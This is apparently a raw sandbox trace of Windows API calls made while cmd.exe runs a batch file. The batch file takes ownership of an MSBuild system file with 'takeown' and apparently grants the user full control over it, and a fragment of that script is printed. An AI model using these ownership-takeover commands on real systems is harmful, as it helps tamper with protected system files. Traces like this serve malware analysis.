(_String1="takeown", _String2="ASSOC") returned 19 [0171.876] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0171.876] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0171.876] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0171.876] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0171.877] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b4bf0, lpFilePart=0x31f2f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f2f0*="Desktop") returned 0x25 [0171.877] SetErrorMode (uMode=0x0) returned 0x1 [0171.902] GetProcessHeap () returned 0x3a0000 [0171.902] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4be8, Size=0x64) returned 0x3b4be8 [0171.903] GetProcessHeap () returned 0x3a0000 [0171.903] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4be8) returned 0x64 [0171.903] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0171.903] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0171.903] GetProcessHeap () returned 0x3a0000 [0171.903] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x120) returned 0x3b4c58 [0171.903] GetProcessHeap () returned 0x3a0000 [0171.903] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x238) returned 0x3b4d80 [0171.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.904] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x31f06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f06c) returned 0xffffffff [0171.905] GetLastError () returned 0x2 [0171.905] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x31f06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f06c) returned 0xffffffff [0171.905] GetLastError () returned 0x2 [0171.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.906] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x31f06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f06c) returned 0x3b4f30 [0171.906] FindClose (in: hFindFile=0x3b4f30 | out: hFindFile=0x3b4f30) returned 1 [0171.906] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x31f06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f06c) returned 0xffffffff [0171.906] GetLastError () returned 0x2 [0171.906] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x31f06c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31f06c) returned 0x3b4f30 [0171.906] FindClose (in: hFindFile=0x3b4f30 | out: hFindFile=0x3b4f30) returned 1 [0171.907] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0171.907] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0171.907] GetConsoleTitleW (in: lpConsoleTitle=0x31f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.379] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b2388, lpFilePart=0x31ebdc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31ebdc*="Desktop") returned 0x25 [0172.379] SetErrorMode (uMode=0x0) returned 0x1 [0172.379] GetProcessHeap () returned 0x3a0000 [0172.379] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b2380, Size=0x64) returned 0x3b2380 [0172.379] GetProcessHeap () returned 0x3a0000 [0172.379] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b2380) returned 0x64 [0172.379] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.379] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0172.379] GetProcessHeap () returned 0x3a0000 [0172.379] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x120) returned 0x3b5220 [0172.379] GetProcessHeap () returned 0x3a0000 [0172.379] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x238) returned 0x3b5348 [0172.380] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.380] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x31e958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e958) returned 0xffffffff [0172.380] GetLastError () returned 0x2 [0172.380] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x31e958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e958) returned 0xffffffff [0172.380] GetLastError () returned 0x2 [0172.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x31e958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e958) returned 0x3b54f8 [0172.381] FindClose (in: hFindFile=0x3b54f8 | out: hFindFile=0x3b54f8) returned 1 [0172.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x31e958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e958) returned 0xffffffff [0172.381] GetLastError () returned 0x2 [0172.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x31e958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31e958) returned 0x3b54f8 [0172.382] FindClose (in: hFindFile=0x3b54f8 | out: hFindFile=0x3b54f8) returned 1 [0172.382] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0172.382] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0172.382] GetConsoleTitleW (in: lpConsoleTitle=0x31ee50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.382] InitializeProcThreadAttributeList (in: lpAttributeList=0x31ecd8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31eda0 | out: lpAttributeList=0x31ecd8, lpSize=0x31eda0) returned 1 [0172.382] UpdateProcThreadAttribute (in: lpAttributeList=0x31ecd8, dwFlags=0x0, Attribute=0x60001, lpValue=0x31ed98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31ecd8, lpPreviousValue=0x0) returned 1 [0172.382] GetStartupInfoW (in: lpStartupInfo=0x31ec94 | out: lpStartupInfo=0x31ec94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0172.382] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0172.382] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31ed34*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31ed80 | out: lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessInformation=0x31ed80*(hProcess=0x78, hThread=0x74, dwProcessId=0x708, dwThreadId=0x72c)) returned 1 [0172.732] CloseHandle (hObject=0x74) returned 1 [0172.732] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0172.732] GetProcessHeap () returned 0x3a0000 [0172.732] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b78f8 | out: hHeap=0x3a0000) returned 1 [0172.732] GetEnvironmentStringsW () returned 0x3b5710* [0172.732] GetProcessHeap () returned 0x3a0000 [0172.732] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb5c) returned 0x3b78f8 [0172.732] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0172.732] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0177.259] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x31ec74 | out: lpExitCode=0x31ec74*=0x0) returned 1 [0177.285] CloseHandle (hObject=0x78) returned 1 [0177.354] _vsnwprintf (in: _Buffer=0x31edbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x31ec80 | out: _Buffer="00000000") returned 8 [0177.354] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.354] GetProcessHeap () returned 0x3a0000 [0177.354] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b78f8 | out: hHeap=0x3a0000) returned 1 [0177.354] GetEnvironmentStringsW () returned 0x3b5710* [0177.354] GetProcessHeap () returned 0x3a0000 [0177.355] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb5c) returned 0x3b78f8 [0177.355] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0177.355] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.355] GetProcessHeap () returned 0x3a0000 [0177.355] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b78f8 | out: hHeap=0x3a0000) returned 1 [0177.355] GetEnvironmentStringsW () returned 0x3b5710* [0177.355] GetProcessHeap () returned 0x3a0000 [0177.355] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb5c) returned 0x3b78f8 [0177.355] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0177.355] GetProcessHeap () returned 0x3a0000 [0177.355] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4540 | out: hHeap=0x3a0000) returned 1 [0177.355] DeleteProcThreadAttributeList (in: lpAttributeList=0x31ecd8 | out: lpAttributeList=0x31ecd8) [0177.355] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.355] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.356] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0177.356] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.356] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0177.356] SetConsoleInputExeNameW () returned 0x1 [0177.356] GetConsoleOutputCP () returned 0x1b5 [0177.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0177.357] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0177.357] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0177.357] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.357] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0177.357] GetProcessHeap () returned 0x3a0000 [0177.357] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5478 | out: hHeap=0x3a0000) returned 1 [0177.357] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5348 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5220 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b2380 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5148 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4f30 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4eb0 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4d80 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c58 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4be8 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b20 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3af538 | out: hHeap=0x3a0000) returned 1 [0177.358] GetProcessHeap () returned 0x3a0000 [0177.358] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ac0 | out: hHeap=0x3a0000) returned 1 [0177.358] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.359] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0177.359] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0xb3, lpOverlapped=0x0) returned 1 [0177.359] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0177.359] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0177.360] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.360] GetFileType (hFile=0x78) returned 0x1 [0177.360] _get_osfhandle (_FileHandle=3) returned 0x78 [0177.360] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0177.360] GetProcessHeap () returned 0x3a0000 [0177.360] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0177.361] GetProcessHeap () returned 0x3a0000 [0177.361] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb4) returned 0x3b4ac0 [0177.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", nBufferLength=0x208, lpBuffer=0x31ec68, lpFilePart=0x31ec60 | out: lpBuffer="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFilePart=0x31ec60*="Workflow.Targets") returned 0x54 [0177.361] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x3b4b80 [0177.361] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.361] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0177.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd66d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd66d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 0x3b4b80 [0177.361] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0x3b4b80 [0177.361] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.361] _wcsnicmp (_String1="MICROS~1", _String2="Microsoft", _MaxCount=0x9) returned 15 [0177.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0x3b4b80 [0177.362] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.362] _wcsnicmp (_String1="WINDOW~1", _String2="Windows Workflow Foundation", _MaxCount=0x1b) returned 11 [0177.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0x3b4b80 [0177.362] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFindFileData=0x31e97c | out: lpFindFileData=0x31e97c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56230575, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x56230575, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x562566d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x0, dwReserved1=0x0, cFileName="Workflow.Targets", cAlternateFileName="")) returned 0x3b4b80 [0177.362] FindClose (in: hFindFile=0x3b4b80 | out: hFindFile=0x3b4b80) returned 1 [0177.362] GetProcessHeap () returned 0x3a0000 [0177.362] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x2a) returned 0x3b4b80 [0177.362] GetProcessHeap () returned 0x3a0000 [0177.362] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0177.364] _tell (_FileHandle=3) returned 63 [0177.364] _close (_FileHandle=3) returned 0 [0177.364] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f2ac | out: _Buffer="\r\n") returned 2 [0177.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.364] GetFileType (hFile=0x7) returned 0x2 [0177.365] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.365] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f26c | out: lpMode=0x31f26c) returned 1 [0177.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.365] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f298, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f298*=0x2) returned 1 [0177.367] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0177.367] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0177.367] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f2a8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0177.367] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f2a8 | out: _Buffer=">") returned 1 [0177.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.367] GetFileType (hFile=0x7) returned 0x2 [0177.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f270 | out: lpMode=0x31f270) returned 1 [0177.368] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.368] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f29c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f29c*=0x26) returned 1 [0177.368] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.368] GetFileType (hFile=0x7) returned 0x2 [0177.368] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.369] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4f4 | out: lpMode=0x31f4f4) returned 1 [0177.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.369] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3b4548*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x31f520, lpReserved=0x0 | out: lpBuffer=0x3b4548*, lpNumberOfCharsWritten=0x31f520*=0x3) returned 1 [0177.369] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f52c | out: _Buffer=" FN=\"Workflow.Targets\" ") returned 23 [0177.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.369] GetFileType (hFile=0x7) returned 0x2 [0177.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0177.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.370] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x17) returned 1 [0177.370] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f54c | out: _Buffer="\r\n") returned 2 [0177.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.371] GetFileType (hFile=0x7) returned 0x2 [0177.371] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.371] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f50c | out: lpMode=0x31f50c) returned 1 [0177.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.371] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f538, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f538*=0x2) returned 1 [0177.373] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0177.373] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0177.373] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0177.373] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0177.373] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0177.373] _wcsicmp (_String1="set", _String2="CD") returned 16 [0177.373] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0177.373] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0177.373] _wcsicmp (_String1="set", _String2="REN") returned 1 [0177.373] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0177.373] _wcsicmp (_String1="set", _String2="SET") returned 0 [0177.373] GetConsoleTitleW (in: lpConsoleTitle=0x31f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.374] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0177.374] SetEnvironmentVariableW (lpName="FN", lpValue="\"Workflow.Targets\"") returned 1 [0177.374] GetProcessHeap () returned 0x3a0000 [0177.374] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b78f8 | out: hHeap=0x3a0000) returned 1 [0177.374] GetEnvironmentStringsW () returned 0x3b62a0* [0177.374] 